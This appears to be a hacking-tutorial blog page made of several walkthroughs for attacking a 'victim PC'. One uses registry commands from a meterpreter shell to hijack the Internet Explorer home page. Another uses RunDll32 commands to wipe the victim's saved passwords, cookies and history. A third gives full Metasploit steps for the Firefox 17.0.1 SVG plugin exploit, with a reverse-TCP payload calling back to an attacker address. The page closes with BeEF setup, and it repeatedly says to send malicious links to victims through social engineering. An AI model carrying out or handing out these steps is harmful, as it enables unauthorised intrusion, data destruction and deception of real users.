Hack Internet Explorer in Remote PC set your desired Home page

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Set Your Desired Website as Home Page

Type the following commands in the command prompt. (Enter the web address of the desired website; here we have taken an example of (http://www.hackingarticles.in/)

REG ADD “HKCU\Software\Microsoft\Internet Explorer\Main” /V “Start Page” /D “http://www.hackingarticles.in/” /F

Now, open the internet explorer in the remote victim PC, we would see that the chosen webpage will open as the homepage.

Stylish Home Page

(Use this link www.shinysearch.com  to put your own desired text.)

REG ADD “HKCU\Software\Microsoft\Internet Explorer\Main” /V “Start Page” /D “http://www.shinysearch.com/myhome.php?theme=matrix&ltext=www.hackingarticles.in” /F

Check out this screenshot seen after opening the internet explorer.

Insert Your Image in Google Background

Type the following command)

(Take the reference of the link   http://www.hackingarticles.in/insert-image-google-search/   to put your own desired image in the background)

REG ADD “HKCU\Software\Microsoft\Internet Explorer\Main” /V “Start Page” /D “http://www.shinysearch.com/myhome.php?style=mypic_full&img=b26b7e0e353d82b7642905e68ca5476e&ltext=Your%20Name” /F

Open the internet explorer; we would get the image in the Google search background.

How to Delete Passwords/Cookies/History/Temp Internet File of Internet Explorer in Remote Victim PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Delete Temporary Internet Files

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8

Delete Cookies

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2

Delete History

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1

Delete From Data

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16

Delete Passwords

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32

Delete All

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255

Delete All + files and settings stored by Add-ons

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351

Hack Windows, Linux or MAC PC using Firefox 17.0.1 + Flash Privileged Code Injection

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the <body> (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Exploit Targets

Firefox 17.0.1

Windows PC

Linux PC

MAC OS X PC

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/multi/browser/firefox_svg_plugin

msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp

msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)

msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (This must be an address on the local machine)

msf exploit (firefox_svg_plugin)>set uripath / (The Url to use for this exploit)

msf exploit (firefox_svg_plugin)>exploit

Now an URL you should give to your victim http://192.168.1.167:8080/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

How to Install BeEF in Windows PC

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. BeEF is pioneering techniques that provide the experienced penetration tester with practical client side attack vectors. Unlike other security frameworks, BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target. This project is developed solely for lawful research and penetration testing.

First download ruby for windows from here

Install it in C: folder and make sure you select all the options. So Ruby is installed now.

After installing Ruby, you need to download the SQLite dll from here

Now extract the SQLite zip file on the Ruby193bin folder:

Now you need to download the ‘DevKit-tdm-32-4.5.2-20111229-1559-sfx.exe’ from here

Now extract the DevKit-tdm-32-4.5.2-20111229-1559-sfx.exe’ file on the C: folder

Open cmd prompt and go to ‘Devkit’ path and we need to run “ruby dk.rb init

Now we need to run “ruby dk.rb install’

Now a few other steps: – ruby dk.rb review (checks things are ok) –

gem install rdiscount –platform=ruby (you should see the message “Temporarily enhancing PATH to include DevKit…”)

Now you need to download the ‘BeEF Project from here

Now open the BeEF file ‘beefproject-beef-beef-0.4.3.7-0-g69c59bb’ and extract the files to C:beef

Open cmd prompt go to the BeEF path and type the following:

ruby install

Now type the below commands one by one

gem install bundler

bundle install

(You will see something similar to this)

Now Type “ruby beef” to start beef.

Of course you will need your Windows Firewall to allow that application 🙂

BeEF is installed successfully. Now go to http://127.0.0.1:3000/ui/panel and check if it is available

http://192.168.1.2:3000/ui/panel (beef is the user name and password)

Send the link http://192.168.1.2:3000/demos/basic.html to the victim via chat or email or any social engineering technique to the victim.

Related Posts Plugin for WordPress, Blogger...